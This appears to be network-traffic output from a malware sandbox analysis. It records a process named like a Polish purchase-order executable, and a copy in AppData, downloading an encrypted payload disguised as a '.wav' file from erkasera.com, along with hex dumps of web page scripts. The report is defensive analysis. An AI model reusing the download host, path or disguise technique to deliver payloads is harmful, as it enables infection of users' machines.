Oct 24, 2024 13:40:39.679135084 CEST	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Thu, 24 Oct 2024 11:40:39 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Oct 24, 2024 13:40:39.679155111 CEST	1236	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;
Oct 24, 2024 13:40:39.679179907 CEST	1236	IN	Data Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
Oct 24, 2024 13:40:39.679194927 CEST	1236	IN	Data Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20 Data Ascii: ge"))\|\|(C()?A("Microsoft Edge"):B("Edg/"))\|\|C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
Oct 24, 2024 13:40:39.679220915 CEST	1236	IN	Data Raw: 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 64 3d 48 28 61 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72 Data Ascii: ay(a))throw Error();d=H(a);if(d&64)return a;d\|=64;if(c&&(d\|=512,c!==a[0]))throw Error();a:{c=a;var e=c.length;if(e){var f=e-1,g=c[f];if(N(g)){d\|=256;b=(d>>9&1)-1;e=f-b;1024<=e&&(za(c,b,g),e=1023);d=d&-2095105\|(e&1023)<<11;break a}}b&&(g=(d>>9&
Oct 24, 2024 13:40:39.679238081 CEST	1236	IN	Data Raw: 3d 62 5b 28 77 26 31 35 29 3c 3c 32 7c 68 3e 3e 36 5d 3b 68 3d 62 5b 68 26 36 33 5d 3b 63 5b 65 2b 2b 5d 3d 67 2b 6b 2b 77 2b 68 7d 67 3d 30 3b 68 3d 64 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 66 29 7b 63 61 73 65 20 32 3a 67 3d 61 5b Data Ascii: =b[(w&15)<<2\|h>>6];h=b[h&63];c[e++]=g+k+w+h}g=0;h=d;switch(a.length-f){case 2:g=a[f+1],h=b[(g&15)<<2]\|\|d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4\|g>>4]+h+d}a=c.join("")}return a}}return a};function Ba(a,b,c){a=Array.prototype.slice.call(a);var d=
Oct 24, 2024 13:40:39.679255009 CEST	1236	IN	Data Raw: 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 7c 7c 62 26 32 3f 4b 3a 78 61 2c 65 3d 21 21 28 62 26 33 32 29 3b 61 3d 42 61 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e Data Ascii: urn a}}function Ha(a,b,c){var d=c\|\|b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32\|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.leng
Oct 24, 2024 13:40:39.679280043 CEST	1236	IN	Data Raw: 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 61 28 74 68 69 73 2e 68 2c 46 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e Data Ascii: toJSON=function(){var a=Ea(this.h,Fa,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if
Oct 24, 2024 13:40:39.679296017 CEST	1236	IN	Data Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())
Oct 24, 2024 13:40:39.679332972 CEST	1236	IN	Data Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59 Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu
Oct 24, 2024 13:40:39.684837103 CEST	1236	IN	Data Raw: 2c 22 49 4d 47 22 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 3d 55 61 28 29 3b 64 2e 73 72 63 3d 24 61 3b 64 2e 61 6c 74 3d 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 3b 64 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 32 34 70 78 22 3b 64 2e 73 74 79 Data Ascii: ,"IMG");d.className=Ua();d.src=$a;d.alt="Warning icon";d.style.height="24px";d.style.width="24px";d.style["padding-right"]="16px";var e=X(a),f=X(a);f.style["font-weight"]="bold";f.textContent=ab;var g=X(a);g.textContent=bb;Y(a,e,f);Y(a,e,g);Y(

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.132.193.46	443	5760	C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 11:40:07 UTC	81	OUT	GET /ruurew/Cwfuvfaf.wav HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-10-24 11:40:07 UTC	195	IN	HTTP/1.1 200 OK Connection: close content-type: audio/x-wav last-modified: Thu, 24 Oct 2024 07:59:00 GMT accept-ranges: bytes content-length: 1138696 date: Thu, 24 Oct 2024 11:39:51 GMT
2024-10-24 11:40:07 UTC	1173	IN	Data Raw: 9f 4a 89 63 3b 58 16 dd 71 c4 69 bc 25 16 22 95 fe d2 2d 4d 76 45 1e 2a dc d5 64 54 54 ae b1 5b af c0 64 d3 47 0e c5 5d 69 b6 98 26 df 7e d6 a1 c7 80 5f c5 3a 46 ff 40 58 3d fe 8c 7d 26 0c 75 fe b8 87 ad 5e 35 c9 98 48 4d 00 0b e6 9b f7 44 9a 7a f3 96 dd 68 70 bf c9 4b a2 a8 e3 06 cc 0a 69 38 b9 f3 6e 14 4a 88 95 52 97 49 a9 ee e7 41 80 6a 35 1c d9 f4 ed 75 f6 ff f2 22 9c e2 66 31 39 ba 58 82 17 02 64 09 86 fb 5b 83 05 e8 8b 39 ee 8e bc 13 3c 53 14 fb da f0 55 e1 f2 dd 30 d8 50 5a eb 02 df e3 f5 a3 d7 a2 01 e8 c3 3f be ad 8a dc d4 d3 6b bb 8e 73 99 e4 ba 0c a1 2f d1 2c 3a 3f a8 aa 8e 27 27 4f a9 43 80 cc e3 af dd 55 0a 2d ad e4 88 aa 4e 69 cc 2f 57 5e a5 2f 23 2b 8b af f2 92 32 e5 e2 9d eb 79 b4 db b3 d1 22 d7 be 8d 8d c6 2d e6 f8 2f da 9c a3 43 9e d8 58 Data Ascii: Jc;Xqi%"-MvE*dTT[dG]i&~_:F@X=}&u^5HMDzhpKi8nJRIAj5u"f19Xd[9<SU0PZ?ks/,:?''OCU-Ni/W^/#+2y"-/CX
2024-10-24 11:40:07 UTC	14994	IN	Data Raw: 64 cd 86 fc a8 81 69 e8 d3 ba 25 d2 07 65 b6 4f d7 76 4e 0e c0 f9 d4 b8 5a 63 11 f0 d6 e0 ac e8 31 5b 4e 13 32 8f 50 ca 57 31 42 65 8a e2 4e c1 99 93 83 84 36 41 24 0f 9d 73 0f 83 d2 bf 30 f0 a7 09 21 76 3f 1c 0b b4 d7 25 b5 a2 96 75 6c 02 e2 ab 7c d5 a1 91 bb 54 b2 b3 9b 0d 0f 04 d4 f3 8c d9 ab a0 e6 42 91 a2 a4 82 2d 2a ff 7f 90 e0 ae 24 13 69 e7 f5 ca 1f c9 99 3b b5 59 5c f6 da 70 a4 6e 50 f2 48 7d 69 3b d4 87 34 ff e0 c2 ab 7d 0f 5f 80 c7 90 e3 48 62 97 d4 c3 8b 91 e8 39 80 ae 2e 11 cf e1 7d 61 85 79 2a 4b cb c7 0d 1c 3f 95 9e 0d ab 64 d1 6a 1a b9 4a 2f fc 65 89 63 85 43 77 d0 f4 3e 42 2c f3 dd cc 2f 22 f8 9f 52 48 fc 39 83 a6 32 1d 8d 6b 41 e3 23 c0 1a 14 3e 91 06 c4 60 01 6c 84 68 b5 83 07 b3 08 d2 8b 2f 8c 4d c0 6c f5 44 69 9a 07 71 3d 1f 63 bd 4a Data Ascii: di%eOvNZc1[N2PW1BeN6A$s0!v?%ul\|TB-$i;Y\pnPH}i;4}_Hb9.}ayK?djJ/ecCw>B,/"RH92kA#>`lh/MlDiq=cJ
2024-10-24 11:40:07 UTC	16384	IN	Data Raw: b7 33 6f 0b b0 62 cb fa fe 3d e0 b6 bb dc a7 13 3c cf f8 86 a4 9f 3b e3 19 73 3f b9 9d 41 d7 e5 61 a3 14 2c a6 3c 7d 86 cf 98 25 10 2e 0e b7 c6 52 a3 d0 a5 d9 83 09 64 34 42 fe de 3c 3b 54 f7 2a 7f 02 22 72 3c 8e 55 e3 37 fc 2f 18 d3 dd 38 91 d7 c4 97 16 6a d6 b9 7e f8 f0 fe b7 76 ef c0 83 ee e6 74 27 73 48 80 76 0d 69 ed b2 5d e3 6b a2 84 2c 3f 77 d5 10 cd 27 ac 41 14 b3 78 c9 2b 57 93 58 44 11 17 04 f1 2b 41 d1 f0 88 37 34 3a 82 5d a1 4f b6 7d bf 83 35 cf a9 1a ab 2d 18 75 c6 20 82 e0 a7 18 91 b5 0c 5f f9 c9 15 ee 72 fc ab cf cc fe 8d 09 db 15 7e 87 d0 8f 50 1f b5 a4 58 74 4a ca cd 87 e0 da 0d 16 c3 f9 d8 91 c4 de 16 ce 9c 7a bd c7 47 93 8b 03 65 30 61 4d 0f 1f 32 59 0e ec 04 d9 c4 a9 39 40 ad c6 db 45 b9 25 f8 7c af 92 b5 16 7a c5 df c0 33 5a 4a d7 74 Data Ascii: 3ob=<;s?Aa,<}%.Rd4B<;T*"r<U7/8j~vt'sHvi]k,?w'Ax+WXD+A74:]O}5-u _r~PXtJzGe0aM2Y9@E%\|z3ZJt
2024-10-24 11:40:08 UTC	16384	IN	Data Raw: eb 4b 45 10 64 42 f8 88 9c f7 cf 27 aa 6e 07 de 78 83 67 ce b7 9a a6 0f bc e8 24 b5 f7 8d 07 14 f9 50 05 5f 3f 92 c2 a8 0f 9d 1a 91 0e 3a 65 8f 0e 2e ff 14 03 c4 8e 65 9b 6d 5c 22 cd f6 70 be 17 f9 98 c7 a8 28 04 e9 2e 22 28 22 6e 0e ed 10 35 8e c1 32 e7 cc c2 9b b8 8d f4 b6 c7 43 1d 05 5e fa 21 ea 27 e7 7c 50 6b 77 0b ea 79 70 6f 4b 43 74 a6 92 05 d0 83 a5 4f 17 82 ce f7 2f 4b 3e 42 17 ca 24 5e 1c b9 79 9a 9b 43 0f 6e 51 c0 c1 0b 02 c9 a6 43 36 be dc f9 84 39 81 91 63 07 b1 36 c2 36 6f 4d 90 94 25 9c fe 21 8d ed 65 a1 bc 12 de 55 d3 da ca db 7a 85 3d aa fa 94 2d c2 b8 c7 6b 72 63 96 57 d4 3a 29 5a 1b 70 2a 6b c8 29 bd 25 ac b7 1f 4e b7 2c dd 4a 31 be 37 a8 00 22 42 d4 b7 32 e1 33 03 5f 14 51 36 60 15 d9 fe d5 81 4e d6 51 83 19 5d 2c ae 9d b9 a4 70 e6 c0 Data Ascii: KEdB'nxg$P_?:e.em\"p(."("n52C^!'\|PkwypoKCtO/K>B$^yCnQC69c66oM%!eUz=-krcW:)Zp*k)%N,J17"B23_Q6`NQ],p
2024-10-24 11:40:08 UTC	16384	IN	Data Raw: da e3 84 1d a0 b7 65 81 df 86 13 ab 6e 17 89 3d 69 4e 11 0c d1 8b 83 a5 39 22 1d b9 6a 32 32 87 06 b2 d8 7a 1b ba 63 d9 78 7c 14 73 35 b5 ad fe 06 3e f3 86 f7 71 85 3c 1d a3 f2 0d 1b 65 04 df 21 3a c7 4c 9a 22 a0 20 cf 72 19 13 ec 5a e0 f2 99 cc b2 77 59 52 ba b4 47 d0 9b 00 f8 0f a5 c1 20 45 21 1a 17 4d 93 c8 19 00 1a cc 38 56 2c 8b 50 da e5 50 ed 58 48 81 de ca e0 f4 34 2d 53 12 d6 16 c3 5e a4 c8 80 29 c4 ca 40 79 da 32 5a b4 1a 54 94 23 5a 47 cc b4 72 7d 6f 6d bd 19 f4 42 52 5b 97 e3 00 83 82 10 a9 f8 ad 4a 5b 3a aa a0 78 05 15 74 aa 09 59 c5 05 7d 7e b2 07 86 91 3c 0d 1b 4a c8 e6 6b a6 3b 19 8d 2b c8 c1 d9 41 e0 81 67 d7 c8 c3 83 56 80 e8 46 5e 38 49 35 e2 15 6c 76 85 0c 79 6f 5a ed e2 34 d7 82 81 09 00 99 36 bb c5 26 fb 22 3a f4 2b a7 27 3e b9 30 57 Data Ascii: en=iN9"j22zcx\|s5>q<e!:L" rZwYRG E!M8V,PPXH4-S^)@y2ZT#ZGr}omBR[J[:xtY}~<Jk;+AgVF^8I5lvyoZ46&":+'>0W
2024-10-24 11:40:08 UTC	16384	IN	Data Raw: 4b 69 be da d6 17 3c c0 b1 11 aa 56 41 9a c9 3f fb c0 fe bf 3d 01 08 eb a0 db 73 c0 d9 36 2e dd 1d b2 33 60 bf 2b ef 09 4b b6 f1 ea 6d 38 2b 4c 7e 39 21 48 41 85 8b 67 23 de 4e 2b 65 7e d6 98 a5 91 15 16 5f 0a 80 d5 29 d7 ee 82 ce 26 55 21 7a 74 68 03 29 c5 11 c9 d9 b9 ff 8c cf c4 93 41 1f d7 03 7e fd c6 55 16 e2 be 13 a2 23 e7 7e 61 3b 77 24 4c 4e a2 94 8e 89 9d 0e cd 95 81 08 1e 60 23 a3 f3 f6 bd e7 e9 0c 51 7d a2 4a bd 4d 7c 0e 1a af de d1 c3 f8 20 06 8f 9a 02 bf fd 05 13 ab cd 26 b8 24 be 4b 31 39 5c 11 af 44 be b5 7a 23 b9 65 7f ef 49 98 6a 4b 1d bf bd e4 23 41 1a 34 76 81 51 3a 3c 67 da 61 30 a6 4e 06 06 8d 1b 96 f3 89 72 1a ba 19 32 9f 1c e5 0d 0a 22 53 3c 0e 1a 79 c4 3f 2e 54 32 30 61 26 e2 5e a3 de 32 d7 8f f2 0a 4b ff 64 c6 11 e4 70 34 53 f3 5e Data Ascii: Ki<VA?=s6.3`+Km8+L~9!HAg#N+e~_)&U!zth)A~U#~a;w$LN`#Q}JM\| &$K19\Dz#eIjK#A4vQ:<ga0Nr2"S<y?.T20a&^2Kdp4S^
2024-10-24 11:40:08 UTC	16384	IN	Data Raw: c3 76 3d bf 5b 5d d0 4e e7 a9 af a9 e9 71 ba 8e 6a b3 56 6a 38 ac d8 ec 08 b7 a3 1f 52 d1 82 ac ff f1 f9 09 b6 df a9 37 4d 51 7d 16 6e 38 f6 13 3e db c2 5c 90 b6 27 61 4c 92 97 47 9b 43 68 b3 82 44 66 f6 4d 74 c2 ec 0e 8d 3c 21 4f 25 ee ca 0c c8 74 21 5e 12 2c 88 72 3f a8 8b e0 ec e0 90 d7 e7 3c 2b 39 66 fd 01 f4 01 4e 5c af 8c 12 4a fd 05 e9 84 81 97 e5 0e 59 05 66 75 0e 3b e7 1a 28 c6 f2 83 54 c8 e7 6f 80 c9 ef 30 46 cd 3e cd 58 ae f4 fa 36 26 d8 86 c4 fe 47 cd ca f7 15 76 f3 e0 9f da c0 41 c6 96 21 22 f9 d0 1a bc 97 e0 bc 90 0d b1 3e ec f7 2d f9 e7 4c dd 72 7e 65 4a 8c ee fc 90 02 05 59 11 a3 67 fa 6a 92 eb 26 00 76 c3 b7 5f f7 fd b9 c9 c7 dc c0 3c 50 53 8c c2 c0 e6 35 39 91 50 31 ad 64 40 79 e3 30 85 63 2f 8b 32 b8 67 08 2f fe 10 92 6b 08 ae 3d e6 a5 Data Ascii: v=[]NqjVj8R7MQ}n8>\'aLGChDfMt<!O%t!^,r?<+9fN\JYfu;(To0F>X6&GvA!">-Lr~eJYgj&v_<PS59P1d@y0c/2g/k=
2024-10-24 11:40:08 UTC	16384	IN	Data Raw: 84 44 0a 62 71 39 b4 4e 44 53 e6 c8 d2 15 5b 75 60 9c 3f bd e9 8d cb 33 34 23 ea 47 aa 19 42 87 0d 72 85 b3 47 b9 5f 4f 25 32 64 7c 28 00 1d 12 ff ef 82 ed e9 ea 58 a9 5e 01 a7 f9 94 b5 ab e2 ce aa f4 60 c6 53 b0 2a 44 ee 28 89 19 25 e1 53 cd 37 ac 90 47 1d e5 cf cb 28 c6 36 84 14 44 6f c0 88 6d 02 1f db 68 ac b9 4a 56 f4 4a f0 eb 75 ab a7 77 f9 71 27 c2 05 ef ff f3 e6 0a 26 73 64 9d 4c 95 9b b1 63 e8 33 65 e3 27 b7 95 ff 2f 8f 8f d1 a8 ea ec 31 75 ac df 92 d7 90 1a a0 82 5a 70 fa 22 c5 18 a8 df bc 91 a4 69 63 56 7c 5c b3 fa 8c 26 a7 7a 44 08 83 1a 96 37 b6 c1 e4 c4 f2 bf 99 d8 23 18 f2 d8 a9 2a d4 64 a3 a2 f1 34 37 51 1c 4f 7c 8a 78 28 f8 b3 ae 2c 9c b7 97 4c 63 47 0f 60 55 56 50 d0 d5 6e 69 68 f8 dc 50 b6 f6 47 e7 c7 ae df a2 0b ed 03 c2 48 2c 6d 4a e9 Data Ascii: Dbq9NDS[u`?34#GBrG_O%2d\|(X^`SD(%S7G(6DomhJVJuwq'&sdLc3e'/1uZp"icV\|\&zD7#d47QO\|x(,LcG`UVPnihPGH,mJ
2024-10-24 11:40:08 UTC	16384	IN	Data Raw: 94 14 b5 f9 91 2a 6b 9c d9 3a 57 df 43 28 69 58 41 5f 56 e8 19 d3 37 b1 57 ec 01 63 cc 8e 4b 03 37 ec 88 8a df 4a d2 23 52 5c 90 f6 65 48 a2 c8 47 50 bb f1 da 50 34 45 f9 3d 40 e0 0c 2c 29 cb 58 73 57 19 e5 f5 11 89 4e f7 4e 0a a8 b2 da d8 b9 0c 64 c6 67 37 03 c5 2e 4e 06 1f 6d de 6c 3a ab 67 90 c3 7f a2 09 a8 97 47 c6 bb ea a7 c1 9f 61 5d c3 c5 ba 6b 9e 66 c5 4f 89 ab 1c 7d 20 2d bf 1a 84 bd dd 83 8f fe 0f 06 73 d4 13 20 39 14 78 fb 00 9c 72 bd 50 92 40 8c 0a 48 62 5c 8a 86 36 7b 61 11 59 0c 7f 32 77 81 37 3f e5 a9 b6 f7 ed 17 4c a5 6b 75 ce cd eb 94 87 88 41 44 45 51 61 2c bb 77 af 78 08 88 13 9d 88 1c 8e 3b 23 77 ce 24 2b 60 e4 be 91 c0 95 8c 8e c8 46 99 2e ec 4f bf 9a da a6 ae 0c f4 da f1 53 dd 8c 0d a5 98 7e 18 10 6e 66 f3 7b 19 3b 29 4b 77 89 f9 78 Data Ascii: *k:WC(iXA_V7WcK7J#R\eHGPP4E=@,)XsWNNdg7.Nml:gGa]kfO} -s 9xrP@Hb\6{aY2w7?LkuADEQa,wx;#w$+`F.OS~nf{;)Kwx
2024-10-24 11:40:08 UTC	217	IN	Data Raw: f9 46 a6 98 53 28 16 33 3a ad 6d 19 2c 7d ba 9a 95 23 6a 08 ef 79 1b 69 88 b1 e6 33 36 1f c4 c3 07 68 2d 05 d6 29 86 91 00 52 da d6 80 13 66 9e 48 59 1c ec f8 74 07 0f c2 8b 03 18 eb 8a 3f ea 21 de 95 ec 08 28 7e 9c 1c c6 86 7c 7c bc b8 e8 64 bb aa 95 cf ed 11 48 f0 ab 5c 26 a2 a9 27 0a 83 fd 87 29 b7 11 1d ef 92 6f a4 06 73 66 ab 16 c0 3c 65 93 95 fc fc 24 d0 3f fb 22 cd e5 6f 14 6c 46 79 63 a4 d4 52 a9 11 b9 b9 8f 80 68 a8 87 14 7e e8 f6 c5 17 55 98 bb da 9f 96 47 13 c7 91 21 b3 ae 8b 3f 6d d2 4e 43 8a 07 06 1f f2 3c 5c 82 22 c5 c9 bf c6 16 3c d7 e0 09 76 c2 c9 4e 0b 55 d9 9e f8 79 54 aa e8 8f cd bd ce 82 df c0 cd 9f f6 09 81 88 ea 56 b6 5b Data Ascii: FS(3:m,}#jyi36h-)RfHYt?!(~\|\|dH\&')osf<e$?"olFycRh~UG!?mNC<\"<vNUyTV[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	188.132.193.46	443	1272	C:\Users\user\AppData\Roaming\FieldNames.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 11:40:24 UTC	81	OUT	GET /ruurew/Cwfuvfaf.wav HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-10-24 11:40:25 UTC	195	IN	HTTP/1.1 200 OK Connection: close content-type: audio/x-wav last-modified: Thu, 24 Oct 2024 07:59:00 GMT accept-ranges: bytes content-length: 1138696 date: Thu, 24 Oct 2024 11:40:08 GMT
2024-10-24 11:40:25 UTC	1173	IN	Data Raw: 9f 4a 89 63 3b 58 16 dd 71 c4 69 bc 25 16 22 95 fe d2 2d 4d 76 45 1e 2a dc d5 64 54 54 ae b1 5b af c0 64 d3 47 0e c5 5d 69 b6 98 26 df 7e d6 a1 c7 80 5f c5 3a 46 ff 40 58 3d fe 8c 7d 26 0c 75 fe b8 87 ad 5e 35 c9 98 48 4d 00 0b e6 9b f7 44 9a 7a f3 96 dd 68 70 bf c9 4b a2 a8 e3 06 cc 0a 69 38 b9 f3 6e 14 4a 88 95 52 97 49 a9 ee e7 41 80 6a 35 1c d9 f4 ed 75 f6 ff f2 22 9c e2 66 31 39 ba 58 82 17 02 64 09 86 fb 5b 83 05 e8 8b 39 ee 8e bc 13 3c 53 14 fb da f0 55 e1 f2 dd 30 d8 50 5a eb 02 df e3 f5 a3 d7 a2 01 e8 c3 3f be ad 8a dc d4 d3 6b bb 8e 73 99 e4 ba 0c a1 2f d1 2c 3a 3f a8 aa 8e 27 27 4f a9 43 80 cc e3 af dd 55 0a 2d ad e4 88 aa 4e 69 cc 2f 57 5e a5 2f 23 2b 8b af f2 92 32 e5 e2 9d eb 79 b4 db b3 d1 22 d7 be 8d 8d c6 2d e6 f8 2f da 9c a3 43 9e d8 58 Data Ascii: Jc;Xqi%"-MvE*dTT[dG]i&~_:F@X=}&u^5HMDzhpKi8nJRIAj5u"f19Xd[9<SU0PZ?ks/,:?''OCU-Ni/W^/#+2y"-/CX
2024-10-24 11:40:25 UTC	14994	IN	Data Raw: 64 cd 86 fc a8 81 69 e8 d3 ba 25 d2 07 65 b6 4f d7 76 4e 0e c0 f9 d4 b8 5a 63 11 f0 d6 e0 ac e8 31 5b 4e 13 32 8f 50 ca 57 31 42 65 8a e2 4e c1 99 93 83 84 36 41 24 0f 9d 73 0f 83 d2 bf 30 f0 a7 09 21 76 3f 1c 0b b4 d7 25 b5 a2 96 75 6c 02 e2 ab 7c d5 a1 91 bb 54 b2 b3 9b 0d 0f 04 d4 f3 8c d9 ab a0 e6 42 91 a2 a4 82 2d 2a ff 7f 90 e0 ae 24 13 69 e7 f5 ca 1f c9 99 3b b5 59 5c f6 da 70 a4 6e 50 f2 48 7d 69 3b d4 87 34 ff e0 c2 ab 7d 0f 5f 80 c7 90 e3 48 62 97 d4 c3 8b 91 e8 39 80 ae 2e 11 cf e1 7d 61 85 79 2a 4b cb c7 0d 1c 3f 95 9e 0d ab 64 d1 6a 1a b9 4a 2f fc 65 89 63 85 43 77 d0 f4 3e 42 2c f3 dd cc 2f 22 f8 9f 52 48 fc 39 83 a6 32 1d 8d 6b 41 e3 23 c0 1a 14 3e 91 06 c4 60 01 6c 84 68 b5 83 07 b3 08 d2 8b 2f 8c 4d c0 6c f5 44 69 9a 07 71 3d 1f 63 bd 4a Data Ascii: di%eOvNZc1[N2PW1BeN6A$s0!v?%ul\|TB-$i;Y\pnPH}i;4}_Hb9.}ayK?djJ/ecCw>B,/"RH92kA#>`lh/MlDiq=cJ
